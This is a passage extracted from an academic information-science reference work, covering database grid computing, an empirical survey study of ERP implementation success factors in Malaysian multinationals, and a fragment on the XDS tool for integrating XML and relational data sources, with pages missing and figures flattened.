FUTURE TRENDS Enterprise database grid computing is increasingly being adopted by major corporations. The acceptance of this trend will continue in the future as its benefits become more obvious. More than any other factor, the fact that vendors are increasingly offering grid-enabled technologies will encourage rapid adoption in the future. Furthermore, grid computing is evolving; and many relevant standards are currently being developed. For instance, there is currently a lack of established standards for dynamic and autonomic resource provisioning, which hinders vendor interoperability (Pollock & Hodgson, 2004; Wolski, 2003). Improvements in such standards will be incorporated in new grid products. However, the current lack of grid standards should not deter the adoption of grid computing. Enterprises can adopt grid methodology (a service-centric view on IT infrastructure: Yan & Chapman, 2006) and leverage their current investments, because companies are now creating new products that are grid-enabled (Dooley, Milfeld, Guiang, Pamidighantam, & Allen, 2006). Furthermore, there will be more developments in service-oriented architecture that will certainly impact grid applications. Ultimately, enterprise database grids will benefit from improvements in semantic grid, which will enable meaningful information pro-
cessing or parsing of deep relationships between data without human intervention.
CONCLUSION The emerging grid infrastructure will substantially reduce the cost of deploying and managing enterprise applications. With further grid product offerings and improvements in hardware and grid protocols, enterprise grid computing will be embraced by many organizations in the future. It is recommendable to adopt grid technology starting with a sweet spot and then incrementally integrating all aspects of the enterprise. Once the benefits of the grid are demonstrated on a small scale, scaling out can be initiated in subsequent operations. Staff resistance to adoption can be overcome through effective communication, team building and incentives to adaptation. Oracle offers a family of products that support database grid for an efficient data-driven business. Enterprise database grid is not a disruptive technology because it leverages existing investments and best practices in an organization.
REFERENCES Berman, F., Fox, G., & Hey, T. (2003). The grid: Past, present, future. In F. Berman, G.C. Fox, & A.J.G. Hey (Eds.), Grid computing (pp. 51-63). New York: John Wiley & Sons. Chrabakh, W., & Wolski, R. (2006). GridSAT: Design and implementation of a computational grid application. Journal of Grid Computing, 4(2), 177-193. Dooley, R., Milfeld, K., Guiang, C., Pamidighantam, S., & Allen, G. (2006). From proposal to production: Lessons learned developing the computational chemistry grid cyberinfrastructure. Journal of Grid Computing, 4(2), 195-208.
1933
Database Integration in the Grid Infrastructure
Finkelstein, A., Gryce, C., & Lewis-Bowen, J. (2004). Relating requirements and architectures: A study of data-grids. Journal of Grid Computing, 2(3), 207-222. Foster, I. (2003). The Grid: A new infrastructure for 21st century science. F. Berman, G.C. Fox, & A.J.G. Hey (Eds.), Grid computing (pp. 65-100). New York: John Wiley & Sons. Goyal, B., & Lawande, S. (2006). Enterprise grid computing with Oracle. New York: McGraw-Hill. Joseph, J., & Fellenstein, C. (2004). Grid computing. Upper Saddle River, NJ: Prentice Hall. Khilani, A. (2005). Oracle enterprise manager 10g grid control: Features for database management. Retrieved December 12, 2007, from http://www. oracle.com/technology/tech/grid/index.html Kumar, A.R., & Burleson, D. (2005). Easy Oracle automation. Kittrell, NC: Rampant Techpress. Kusnetzky, D., & Olofson, C.W. (2004). Oracle 10g: Putting grids to work. IDC White Paper. Retrieved December 12, 2007, from http://www. oracle.com/technology/tech/grid/index.html Murch, R. (2004). Autonomic computing. Upper Saddle River, NJ: Prentice Hall. Oracle Inc. (2005). Grid computing with Oracle. Technical white aper. Retrieved December 12, 2007, from http://www.oracle.com/technology/ tech/grid/index.html Pollock, J.T., & Hodgson, R. (2004). Adaptive information: Improving business through semantic interoperability, grid computing, and enterprise integration. New York: John Wiley. Watson, P. (2003). Databases and the grid. In F. Berman, G.C. Fox, & A.J.G. Hey (Eds.), Grid computing (pp. 363-384). New York: John Wiley. Wolski, R. (2003). Experiences with predicting resource performance online in computational
KEY TERMS Applications Grid: It shares and reuses application code but uses software technologies like service-oriented architectures that facilitate sharing business logic among multiple applications. Grid Computing: A style of computing that dynamically pools IT resources together for use based on resource need. It allows organizations to provision and scale resources as needs arise, thereby preventing the underutilization of resources (computers, networks, data archives, instruments). Information Grid: This grid shares information across multiple consumers and applications. It unlocks fragmented data from proprietary applications by treating information as a resource to be shared across the grid. Infrastructure Grid: This grid pools, shares and reuses infrastructure resources such as hardware, software, storage and networks across multiple applications. Provisioning: The allocation of resources to consumers on demand. A system determines specific need of the consumer and provides the resources as requested. Semantic Web: Information processing model in which computers using resource description framework (RDF) and other technologies can explicitly associate meanings or parse relationships between data without human intervention.
Database Integration in the Grid Infrastructure
Service-Oriented Architecture (SOA): This is a form of software design that allows different applications to interact in business processes regardless of specific technology like programming languages and operating systems Silos/Islands of Applications/Computing: Condition whereby servers or computing resources are idle most of the time when the peak load is not reached. Such IT systems are not
designed to share resources with each other, thus creating islands of information and computing infrastructure within a single enterprise. Virtualization: A form of abstraction that provides location- and technology-transparent access of resources to the consumer. It decouples the tight connections between providers and consumers of resources, thus allowing sharing of the same resources by multiple users as needs arise.
This work was previously published in Encyclopedia of Information Science and Technology, Second Edition, edited by M. Khosrow-Pour, pp. 955-960 , copyright 2009 by Information Science Reference (an imprint of IGI Global).
1935
1936
Chapter 6.4
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations Fiona Fui-Hoon Nah University of Nebraska-Lincoln, USA Zahidul Islam Independent University, Bangladesh Mathew Tan Agilent Technologies, Malaysia
ABSTRACT Enterprise resource planning (ERP) implementations in multinational manufacturing companies have experienced various degrees of success. This article investigates factors influencing the success of ERP implementations in multinational manufacturing companies in the Malaysian Free Trade Zone. The results indicate that enterprisewide communication and a project management program are key factors influencing the success of ERP implementations, while other factors such as top management support as well as teamwork and composition are not as critical to the outcome. Organizational culture is a moderator of the relationships between enterprise-wide com-
munication, a project management program, and the success of ERP implementations.
INTRODUCTION Enterprise resource planning (ERP) refers to a seamlessly integrated family of software packages designed to integrate various financial, human resources, supply chain, and customer information functions. This system is a natural development and progression of Material Requirements Planning (MRP/MRP II) that was popular in the 1970’s. Initially conceived to increase the efficiency of materials planning, the suite of software packages eventually evolved to cover a wide scope of organizational functions, including inventory
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
control, finance, human resources, and manufacturing. Many companies experienced successes, but many more failed in their implementations. Some companies, such as FoxMeyer Corporation, experienced bankruptcy and resorted to suing the software company for failing to deliver the promises of the ERP system. ERP implementation is a massive and costly affair (Davenport, 2000; Lee, Siau, & Hong, 2003; Siau, 2004). ERP implementations frequently consume a large portion of a company’s time and resources (Siau & Messersmith, 2002, 2003). After more than twenty years of implementation and software development, much research has been gathered on the subject for developed nations (Bingi, Sharma, & Godla, 1999; Everdingen, Hilleegersberg, & Waarts, 2000; Kermers & van Dissel, 2000; Kumar, Maheshwari, & Kumar, 2003; Nadkarni & Nah, 2003; Scott & Vessey, 2002). However, the Southeast Asia region faced many challenges with ERP implementations (Davison, 2002; Soh, Sia, & Tay-Yap, 2000). The literature is scarce concerning ERP implementations and their success in this region (Tarafdar & Roy, 2003). The primary users of ERP systems are large multinational companies because local or regional small- to medium-sized companies have yet to fully embrace the benefits of ERP systems. In this research, we focus on investigating the factors contributing to the success of ERP implementations in multinational manufacturing companies in the Malaysian Free Trade Zone—a central zone in Southeast Asia.
LITERATURE REVIEW ERP is a solution to fragmentation of information in large business organizations (Davenport, 1998). An ERP system typically comprises a central, state-of-the-art, comprehensive database that collects, stores, and disseminates data across all business functions and activities in an enterprise. By integrating all business functions,
economies of scale are obtained and the business gains a significant operating cost reduction, in addition to improved capabilities and information transparency. The increased business trends of globalization, mergers, and acquisitions demand that companies must have the ability to control and coordinate increasingly remote operating units. An ERP system can help to achieve this by enabling the sharing of real-time information across departments, currencies, languages, and national borders. The dream of creating an enterprise-wide system began in the 1970’s, but was then unrealized due to the technological barriers at that time. Instead, most companies created what McKenney and McFarlan (1982) termed “islands of automation”, which naturally evolved as new IT applications were introduced to fill the constantly-emerging business needs. This gave rise to a plethora of different systems that were loosely interfaced. As a result, information was scattered throughout an organization, and detailed analyses of an organization’s performance across its business functions were not possible. Such information was impossible to obtain unless manual record-sifting or specialized programming requirements were carried out. In time, the organizational costs to maintain these “legacy” systems began to exceed the funds available for building new systems (Lientz & Swanson, 1980). Enterprise systems provide a backbone of information, communication, and control for a company (Buckhout, Frey, & Nemec, 1999), and embody the current best business practices for organizational processes (Esteves & Pastor, 2000). Numerous benefits include improvements in: • •
•
Cooperation between managers and employees; Consolidation of finance, marketing and sales, human resource, and manufacturing applications; Management information available—realtime information available anywhere, anytime; 1937
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
• • •
Informal systems for materials management/inventory/production control; Lead-times, manpower costs, overtime, safety stocks, work-in-progress; and Delivery times.
An ERP system is a set of customizable and highly-integrative real-time business application software modules sharing a common database and supporting core business, production, and administrative functions such as logistics, manufacturing, sales, distribution, finance, and accounting. Companies that are structurally complex, geographically dispersed, and culturally vibrant tend to present unique challenges to ERP implementation (Markus, Tanis & Fenma., 2000). Unique issues of change management are particularly important for multinational companies where their parent sites are geographically separate. This complexity involves several dimensions including business strategy, software configuration, technical platform, and management execution. Of these four, management execution contributes toward ERP implementation success to the greatest degree (Nah, Zuckweiler, & Lau, 2003). Different managerial reporting lines, languages, and national cultures also make managing a multi-site ERP implementation project challenging (Markus et al., 2000). Local management must therefore be prepared to deal with the issues of enterprisewide implementation on a site level. In particular, companies in Asia confront issues substantially different from those faced by companies in the developed world (Tarafdar & Roy, 2003) due to the differences in sophistication of IT use and cultural influences.
THEORETICAL BACKGROUND ON FACTORS CONTRIBUTING TO ERP IMPLEMENTATION SUCCESS To investigate specific metrics for ERP implementation success, we reviewed the literature and
1938
identified three sets of taxonomy or classification. They are: (i) the unified critical success factors model (see Table 1) proposed by Esteves and Pastor (2000), (ii) 22 critical success factors (see Table 2) identified by Somers and Nelson (2001, 2004), and (iii) seven broad categories of critical success factors (see Table 3) developed by Nah and Delgado (2006) which were derived from the 11 critical success factors (see Table 4) identified by Nah, Lau, and Kuang (2001). Esteves and Pastor (2000) classify critical success factors into Organizational and Technological, and then further sub-divide them into strategic and tactical factors. By cross-referencing each of the factors with its citations in the literature, Esteves and Pastor (2000) derived the ERP implementation success matrix (also termed unified critical success factors model) presented in Table 1. Somers and Nelson (2001) identified 22 critical success factors presented in Table 2 and evaluated them across stages of ERP implementation. The top six factors across the stages are: (i) top management support, (ii) project team competence, (iii) inter-departmental cooperation, (iv) clear goals and objectives, (v) project management, and (vi) inter-departmental communication. Another comprehensive examination of the critical success factors of ERP implementation was carried out by Nah and her colleagues (Nah, et al., 2001; Nah, et al., 2003; Nah & Delgado, 2006). These factors fall into seven broad categories (see Table 3) and can be further broken down into 11 critical success factors (see Table 4). Among the 11 critical success factors presented in Table 4, the top six critical success factors identified by Chief Information Officers of Fortune 1000 companies are: (i) top management support, (ii) project champion, (iii) ERP teamwork and composition, (iv) project management, (v) change management program and culture, and (vi) effective enterprise-wide communication (Nah et al., 2003).
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Table 1. Unified critical success factors model Strategic
Technological
Organizational
• • • • • • • • • • •
Sustained management support Effective organizational change management Good project scope management Adequate project team composition Comprehensive business process reengineering Adequate project champion role User involvement and participation Trust between partners Adequate ERP implementation strategy Avoid customization Adequate ERP version
Hence, top management support, project management, and enterprise-wide (or inter-departmental) communication are three common factors in Nah et al.’s (2003) and Somers and Nelson’s (2001) “top factors” lists, whereas “ERP teamwork and composition” in Nah et al.’s (2003) list captures key aspects of project team competence and inter-departmental cooperation in Somers and Nelson’s (2001) list. Therefore, we selected this set of four factors—top management support, project management, enterprise-wide communication, and ERP teamwork and composition—as independent variables for our study. These four factors are also ranked among the top five factors in Nah and Delgado’s (2006) case study on ERP implementations in two organizations. Figure 1 shows the research model, and the next section provides justifications for the hypotheses. Hypotheses 1-4 specify the direct hypothesized effect of the independent variables—top management support, teamwork and composition, enterprise-wide communication, project management program—on the dependent variable—success of ERP implementation, whereas Hypotheses 5-8 state the moderating effect of organizational culture on these relationships.
Tactical • • • • • • •
Dedicated staff and consultants Strong communication inwards and outwards Formalized project plan/schedule Adequate training program Preventive troubleshooting Appropriate usage of consultants Empowered decision-makers
• •
Adequate software configuration Legacy systems knowledge
Table 2. Twenty-two critical success factors model Critical Success Factors 1. Top management support 2. Project team competence 3. Interdepartmental cooperation 4. Clear goals and objectives 5. Project management 6. Interdepartmental communication 7. Management of expectations 8. Project champion 9. Vendor support 10. Careful package selection 11. Data analysis and conversion 12. Dedicated resources 13. Use of steering committee 14. User training on software 15. Education on new business processes 16. Business process reengineering 17. Minimal customization 18. Architecture choices 19. Change management 20. Partnership with vendor 21. Use of vendors’ tools 22. Use of consultants
ERP CRITICAL SUCCESS FACTORS Rockart (1979) is one of the first researchers to study critical success factors of IT implementa-
1939
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Table 3. Seven broad categories of critical success factors 1.
Business plan and vision 1.1 Business plan/vision 1.2 Project mission/goals 1.3 Justification for investment in ERP
2.
Change management 2.1 Recognizing the need for change 2.2 Enterprise-wide culture and structure management 2.3 Commitment to change—perseverance and determination 2.4 Business process reengineering 2.5 Analysis of user feedback 2.6 User education and training 2.7 User support organization and involvement 2.8 IT workforce re-skilling
3.
Communication 3.1 Targeted and effective communication 3.2 Communication among stakeholders 3.3 Expectations communicated at all levels 3.4 Project progress communication
4.
ERP team composition, skills, and compensation 4.1 Best people on team 4.2 Balanced or cross-functional team 4.3 Full-time team member 4.4 Partnerships, trust, risk-sharing, and incentives 4.5 Empowered decision-makers 4.6 Performance tied to compensation 4.7 Business and technical knowledge of team members and consultants
5.
6.
1940
Project management 5.1 Assign responsibility 5.2 Clearly establish project scope 5.3 Control project scope 5.4 Evaluate any proposed change 5.5 Control and assess scope expansion requests 5.6 Define project milestones 5.7 Set realistic milestones and end dates 5.8 Enforce project timeliness 5.9 Coordinate project activities across all affected parties 5.10 Track milestones and targets Top management support and championship 6.1 Approval and support from top management 6.2 Top management publicly and explicitly identifies project as top priority 6.3 Allocate resources 6.4 Existence of project champion 6.5 High-level executive sponsor as champion 6.6 Project sponsor commitment
7.
Systems analysis, selection, and technical implementation 7.1 Legacy system 7.2 Minimum customization 7.3 Configuration of overall ERP architecture 7.4 Vigorous and sophisticated testing 7.5 Integration 7.6 Use of vendor’s development tools and implementation methodologies 7.7 ERP package selection 7.8 Selection of ERP architecture 7.9 Selection of data to be converted 7.10 Data conversion 7.11 Appropriate modeling methods/techniques 7.12 Troubleshooting
Table 4. Eleven key critical success factors Critical Success Factors 1. ERP teamwork and composition 2. Change management program and culture 3. Top management support 4. Business plan and vision 5. Business process reengineering with minimum customization 6. Project management 7. Monitoring and evaluation of performance 8. Effective enterprise-wide communication 9. Software development, testing, and troubleshooting 10. Project champion 11. Appropriate business and IT legacy systems
tions. According to his account, these factors are the “areas in which results, if they are satisfactory, will ensure successful competitive performance for the organization” (p. 85). Most of the literature in the MIS field list in excess of 20 critical success factors (Nielsen, 2002). Esteves and Pastor (2000) present a unified model of critical success factors, and further studied the effects of these factors in SAP’s ASAP implementation methodology. To study key critical factors influencing ERP implementation success, we identified four “top” factors—top management support, ERP teamwork and composition, enterprise-wide communication, and project
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Figure 1. Research model Independent variables Top management support
H1
Moderator Teamwork and composition
H2 Organizational culture Dependent variable
H5-H8 Enterprise-wide communication
H3
Project management program
H4
management program—that we examine in this research. Technological factors such as system configuration, customization, and legacy data migration are outside the scope of this research and are excluded from this study.
Top Management Support Not only is the criticality of top management support widely cited throughout the ERP literature (e.g., Dong, 2001; Somers & Nelson, 2004), several studies (Akkermans & van Helden, 2002; Esteves & Pastor, 2000; Nah et al., 2003; Somers & Nelson, 2001) have also identified top management support as the top and most crucial factor in ERP implementation. Similarly, Sarker and Lee (2003) identified strong and committed leadership as a necessary condition for success in ERP implementation. Willocks and Sykes (2000) noted that senior-level sponsorship, championship, support, and participation is one of the critical enabling factors for success in an ERP project. Public, explicit, and sincere support for the project must be present to emphasize the priority of the project. Accordingly, commitment of valuable resources to the implementation effort (Holland, Light, & Gibson, 1999; Roberts & Barrar, 1992)
Success of ERP implementation
provides the practical support that is needed to ensure success in an ERP project. Top management commitment is the most widely-studied factor in successful IS implementations (Dong, 2001) and is also the most severe source of difficulty in IS implementations. Top management support is even more important in the case of ERP because of the scale of the project and the amount of resources needed for the enterprise-wide project. Hence, we hypothesize that: H1: Top management support increases the level of success of ERP implementation.
Teamwork and Composition The ERP team should comprise the best people in the organization to maximize the chances of success of the project (Buckhout et al., 1999; Bingi et al, 1999; Rosario, 2000). The team should be cross-functional and possess the necessary technical and functional skills for design, implementation, and assimilation. The team will have to integrate business functions with the capabilities of the software as well as possess the necessary credentials to influence business process changes where necessary. The effective
1941
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
use of consultants also improves the likelihood of success of the project (Haines & Goodhue, 2003). Compensation, incentives, and the mandate for successfully implementing the system on time and within budget should be given to the team to foster teamwork in the project (Buckhout et al., 1999). It is also helpful to ensure that the ERP team is colocated to facilitate teamwork and coordination among the members. We, therefore, hypothesize that: H2: The use of cross-functional teams that comprise people with the best business and technical knowledge increases the level of success of ERP implementation.
of benefit while convincing them to abandon the old, comfortable systems requires persuasiveness and acts of showmanship on the part of management and the implementation team. Users need to know that the feedback they provide will be considered and acted upon (Rosario, 2000). Among the stakeholders of companies studied by Holland et al. (1999), it was found that communication is a critical success factor of ERP implementation. For example, Shanks, Parr, Hu, Corbitt, Thanasankit, and Seddon (2000) found that the likelihood of ERP implementation failure increased when dates were not properly communicated well in advance to stakeholders. Based on the above discussion, we hypothesize that:
Enterprise-Wide Communication Communication across the different levels and functions of an organization is necessary for success in ERP implementation (Akkermans & van Helden, 2002; Falkowski, Pedigo, Smith, & Swanson, 1998; Parr, Shanks, & Darke, 1999). Communication is a complex factor that includes, but is not limited to, specifications of individual roles and responsibilities, clear definitions of the project milestones, pre-implementation training, and unambiguous definition of the time horizon (Petroni, 2002). Monthly bulletins, newsletters, weekly meetings, and frequent e-mail updates are among the tools that can be employed. This communication needs to be two-way to avoid design gaps that can occur if the exact business requirements or comments and approval from the ground up are ignored. Esteves and Pastor (2000) also noted that both “outward” communication to the whole organization and “inward” communication to the project team are very important. Rosario (2000) advocates an early “proof of concept” to minimize skepticism and sustain excitement. This kind of demonstration should be public and well endorsed by key project champions and top management. Keeping the morale high and convincing the users that the new ERP system is
1942
H3: Enterprise-wide communication during the implementation increases the level of success of ERP implementation.
Project Management Program The proper and effective management of an ERP project is essential for its success (Nah et al., 2003). An ERP project management program requires well-defined task assignments, accounting for resource allocations, project control-keeping, and avoiding “creep” (Bagranoff & Brewer, 2003; Rosario, 2000) which is the tendency of the project to acquire additional software requirements and customization and to uncover hidden issues as time goes by. Jiang, Klein, and Balloun (1996) found that a competent project manager is the second most important factor in an IS implementation. The scope of the project should be clearly established, managed, and controlled (Shanks et al., 2000). Ross (1999) indicated that establishing program scope is the key to successful ERP implementation. Proposed changes should be evaluated against business benefits, and scope expansion requests should be assessed in terms of the additional time and cost of proposed changes (Sumner, 1999). In addition, approved
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
changes need to be coordinated across all affected parties (Falkowski et al., 1998). Schniederjans and Kim (2003) proposed that ERP systems implementations can be supplemented by Total Quality Management (TQM) and Business Process Re-engineering (BPR) programs to prepare an organization to be more receptive to the new ERP system. They suggested that the actual ERP implementation be preceded by BPR and followed up by a rigorous TQM program, to produce the effect of Lewin’s (1951) recommended change criteria of unfreezing (BPR), change (ERP), and refreezing (TQM). As discussed above, project management is essential to the success of ERP implementations. Thus, we hypothesize that: H4: A project management program increases the level of success of ERP implementation.
proposition that organizational culture is useful in understanding successful ERP implementations. They proposed a Business Systems Purpose Analysis (BSPA) methodology and recommended its integration into SAP’s ASAP implementation methodology. Skok and Legge (2002) highlight the importance of cultural as well as business process changes. According to them, ERP problems commonly lie in the employees feeling uncomfortable with the cultural changes, which follow from process changes in the ERP implementation. Thus, unless the organizational culture promotes openness in communication and facilitates learning, the employees may behave in a detrimental fashion towards the new ERP system, causing its failure.
Organizational Culture as a Moderator of ERP Implementation Success
ORGANIZATIONAL CULTURE The organizational culture paradigm, as defined by Johnson and Scholes (2005), is a set of assumptions held relatively in common and taken for granted in an organization. It includes collective experience, values, beliefs, and behavioral norms. These assumptions exist at the organizational level, and they have worked well enough to be considered valid. An organizational culture that promotes learning and innovation can be especially influential to the success or failure of an organization’s IT innovation or strategy (Johnson & Scholes, 2005; Sitkin, 1992). Scott and Vessey (2000) provide case study evidence to show that organizational culture can impact the success or failure of ERP implementation. According to Sitkin (1992), the proximity of an organization towards a “learning” state would, in theory, greatly facilitate the process of change. An organizational culture that promotes learning encourages involvement/participation and adaptation. Edwards and Panagiotidis (2000) support the
A management team that readily accepts new concepts and is able to learn to accept and adapt to new tools as they become available is able to drive the implementation of a new enterprise-wide system more effectively, as opposed to a management team that prefers to maintain the “status quo” and is suspicious of progress (Dong, 2001). Since learning in an organization needs to be led from all levels of the organization, particularly from top-level management, a management team that is conducive to change (as in the case of an open and supportive organizational culture) is more likely to convince and persuade the rest of the organization to follow suit, which contributes toward the success of the ERP implementation. H5: Organizational culture moderates the relationship between top management support and the success of ERP implementation. ERP implementation teams are by necessity cross-functional, as the new system brings
1943
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
together and integrates the various functions within an organization. In order to derive the best benefits from the ERP system, the crossfunctional teams working on the project should not only be able to work well together, but also understand and appreciate the different strengths and skills that each member brings to the teams. Closed or non-learning organizations are more prone to encounter difficulties in facilitating teamwork and coordination among members of cross-functional teams. H6: Organizational culture moderates the relationship between ERP teamwork-and-composition and the success of ERP implementation. An organizational culture that promotes openness in communication facilitates the process of organizational learning, which contributes toward ERP implementation success. An open and supportive organizational culture encourages increased interaction and improved communication, which help to facilitate communication of new and complex concepts of ERP systems to the end-users. Since the sheer scale and complexity of an ERP system will require almost all company personnel to learn new tools and new ways of working, organizational culture can facilitate the learning process involved in such implementations that are necessary for successful implementation. H7: Organizational culture moderates the relationship between enterprise-wide communication and the success of ERP implementation. Team leaders faced with the challenge of managing a project this massive typically face tight deadlines and a near-impossible means of disseminating all the required training to end-users. Furthermore, the leaders of the project team need to clearly specify responsibilities, establish and control project scope, evaluate any proposed change, assess scope expansion requests, define
1944
and set project milestones, enforce timeliness of the project, and coordinate project activities across all affected parties. Thus, a learning culture benefits these processes and increases the success of the implementation. H8: Organizational culture moderates the relationship between a project management program and the success of ERP implementation.
SUCCESS OF ERP IMPLEMENTATION The dependent variable in this study is success of EPR implementation. “Success” can be defined in several ways. For project leaders, a successful implementation means that the project is completed on time and within budget and where there is minimal disruption to product shipment and customer service during the cutover period. However, from a strategic point of view, success does not only refer to meeting the “Go Live” date, but also to the increased value of the business from usage of the new ERP system. Markus and Tanis (2000) also pointed out that success means different things depending on the perspectives that one is taking and the person defining it. For example, project managers often define success in terms of completing the project on time and within budget. The business, however, takes the view of a smooth transition to stable operations with the new system, achieving intended business improvements like inventory reductions, and gaining improved decision-support capabilities (Markus & Tanis, 2000). Markus and Tanis define optimal success as the “best outcomes the organization could achieve with enterprise systems, given its business situation, measured against a portfolio of project, early operational, and longer-term business results metrics” (p. 186). Similarly, in this study, we will adopt the business value and performance perspective of success in ERP implementation. This perspective is also
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
adopted by other researchers studying IS/IT success (Langdon, 2006; Mukhopadhyay, Kekre, & Kalathur, 1995; Tallon & Kraemer, 2006). Petroni (2002) pointed out that simply asking users to rate their level of satisfaction would not be accurate or sufficient to assess success of an implementation. Neither would it be practical to ask a manager to define an implementation as anything less than successful, since no one is typically willing to shoulder the responsibility of failure. Petroni therefore suggests a set of criteria for judging the success of implementation (see Table 5) to help minimize respondent bias. We adapt Petroni’s criteria, which include assessment of both performance and user satisfaction, to quantify optimal success from the business and strategic perspective. These criteria are also in line with Gable, Sedera, and Chan’s (2003) measurement model for enterprise system success which covers organizational and individual impact as well as user satisfaction.
RESEARCH METHODOLOGY The primary source of data collection was a survey, which was administered to both managerial and non-managerial staff from multinational companies in the Free Trade Zone of Malaysia. These
companies had implemented ERP systems and were involved in distribution and manufacturing activities. The survey questionnaire was adapted from Nah et al. (2003) and Petroni (2002), and is presented in the Appendix. Pilot studies were conducted to validate these measures prior to finalizing the questionnaire. The primary means of distributing the survey questionnaire was via e-mail. The questionnaire was distributed after pre-contacting the recipients and informing them about the pending survey. Two hundred copies of the questionnaire were distributed, and the responses were collected electronically over a three-month period. A total of 110 questionnaires were returned. Hence, the response rate is 55%.
RESULTS Respondents were asked to provide demographic information. Analysis of the demographic data indicates that 63% of the respondents were male and 37% were female. In terms of education, 66% reported holding a Master’s degree and 14% have a Ph.D. Thirty-seven percent of the respondents reported holding managerial positions, while 54% were in non-managerial positions. A majority of the respondents (63%) have been with their companies for less than five years, and 18% of the
Table 5. Optimal success criteria
Improved ability
Improved efficiency and user satisfaction
Reductions
Ability to meet volume/product changes Capacity planning Cost estimation Inventory control Delivery dates Production scheduling Cooperation between managers and employees Coordination between finance, marketing, and sales Delivery or lead-times Informal systems for materials management Informal systems for inventory control Informal systems for production control Expediting of shipments Expediting of incoming materials Work in progress (WIP)
1945
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Table 6. Summary of reliability analysis Variables
Number of items
Cronbach Alpha
Top Management Support
5
.82
Teamwork and Composition
5
.72
Effective Communication
5
.89
Project Management Program
5
.75
Organizational Culture
6
.83
Success of ERP Implementation
5
.83
respondents have been with their companies for 6 to 10 years. Eighty percent of the respondents were from companies that exceeded $4 million USD in annual revenue, and 64% have more than 3,000 employees in their organizations. Table 6 shows the reliability assessments for both the independent and dependent variables. To assess the internal consistency and stability of data, Cronbach Alpha was used to establish the inter-item consistency. Since the Cronbach Alpha coefficients are all above 0.7 (Nunnally, 1978), it can be concluded that the measures are reliable. Regression analysis was first carried out to assess H1-H4. Hierarchal regression was then used to test H5-H8, the moderating effect of organizational culture on the relationships between the independent variables and success of ERP implementation. We used a significance level of 0.05, or 5%, as the basis for accepting or rejecting the hypotheses. As shown in the regression table in Table 7, the coefficient of R 2 is 0.389, indicating that the four independent variables explain 38.9% of the variance. Durbin Watson of 1.71 indicates that there is no auto-correlation problem. Tolerance and VIF values are also within the acceptable range indicating that there is no multi-collinearity problem. The results presented in Table 7 prompted rejection of Hypotheses 1 and 2, and acceptance of Hypotheses 3 and 4. The results suggest that top management support (p=0.42) and teamwork
1946
and composition (p=0.42) did not influence success of ERP implementation. On the other hand, enterprise-wide communication (p
1976
Business Information Integration from XML and Relational Databases Sources
Figure 5(b). Example of the XDSSchema corresponding to the output XML format represented in Figure 5(a)
Table 5. Grammar of the XDSQuery language Query Expr ExprSingle
Business Information Integration from XML and Relational Databases Sources
Figure 6. Format of the elements of the XDSQuery language
Figure 7. Example of an XDSConnections document
1978
Business Information Integration from XML and Relational Databases Sources
Figure 8. Example of an XDSQuery request
refers to the field of the record that has the information associated to these XML nodes. Since a record can contain NF2 structures – for example, after the NEST operation – it is possible to find composed or/and multi-value fields. In XDSSchema always exists a currentNF2 structure to refer to the database record. If the user wants to refer to a value that is inside a composed or multi-value field, it will be impossible to access to it directly in the SQL sentence. To permit it, the attribute newF2 allows changing the origin of the currentNF2. The value of this new attribute will point to the name of a composed or multivalue field in the preceding currentNF2. If it is a multi-value field, in addition to this, it will be necessary to show the repetitive structure using the value unbounded in the maxOccurs attribute, and to indicate the name of the associated multivalue field in the occursField attribute. Finally, a element can have so many elements as different transformations the user wants to make. When the user executes an XDSQuery, he or she will have to indicate what transformation he or she wants to apply to the results of the SQL query (each element has a name attribute
to identify it) and the root element of the applied XDSSchema. Figures 5(a) and 5(b) show an example of the XDSSchema application. Figure 5(a) shows the structure of the output XML result using a DTD representation and explained table. Figure 5.2 shows the equivalent structure to the previous representations using the syntax of the XDSchema. Finally, in this last figure also appears the general representation (the three main elements of the element displayed in different colors: , name> and with their contents) of any XML document obtained like results after applying the indicated XDSschema.
XDSQuery XDSQuery is the component that processes the client requests and their results, but it is also the name of the language used by the clients to query the data sources. This language is very similar to the XQuery language, but it is written in XML. In this way, the user can more easily create and modify the queries. XDSQuery is an extended set of XQuery but is written in XML and adds new features to ac-
1979
Business Information Integration from XML and Relational Databases Sources
cess not only XML sources, but also relational sources. XDSQuery exploits the For-Let-WhereReturn (FLOWR) expression of XQuery to make the queries. Table 5 shows the commands or elements of the XDSQuery grammar. Figure 6 shows the rules to combine the elements of the preceding table to obtain a client request written in the XDSQuery language. The element indicates in XDSQuery the queried source. Its connection and query attributes identify the connection name to the data source and the native query to execute, which will have been defined previously in the XDSConnections document. If it is an sql data source, it also will be possible to specify the XDSSchema and the root element, using the schema and root attributes to apply to the output result. If these attributes are not specified in the request to an sql source, it will be applied by default, the XML canonical transformation model. Moreover, in a request to an sql source, the element can also have parameters for the query. In the next example, we are going to describe the XDSQuery use. We will suppose that a client desires to obtain an XML document with the data of some teachers and the courses they impart. The teachers’ and courses’ information are stored in a relational database, and the codes of the teachers are in an XML document. Figure 7 shows the configuration XDSConnections document for this example. In this document, the connection to the XML document “prof.xml” is specified, which contains the teacher codes and the database. In the first connection, the XPath query is defined to the XML document. In the second connection is the SQL query, to obtain the information about the specified teachers and their courses from the database. Moreover, in this last query, it is also specified that the results have to be nested and the XDSSchema applied to the XML output.
1980
Figure 8 shows the details of the XDSQuery to be applied by the user to obtain the described result in the previous example.
FUTURE TRENDS In the future, businesses will surely have to continue exchanging their data using the Web or intranets. Therefore, our tool will continue to be useful. However, XDS only allows making requests to the information stored in the different data business sources, but not for updating this information. This would be the main new extension we should to add to our tool. The idea would be to update the stored information in the different data sources; for example, from the information embedded in an XML document. This embedded information should be able to update every type or source, relational or XML, showing the destination of each piece of data in the sources to update. Adding this new feature to the XDS tool means it could be used like a full management information system inside a business that mainly works with relational and XML information.
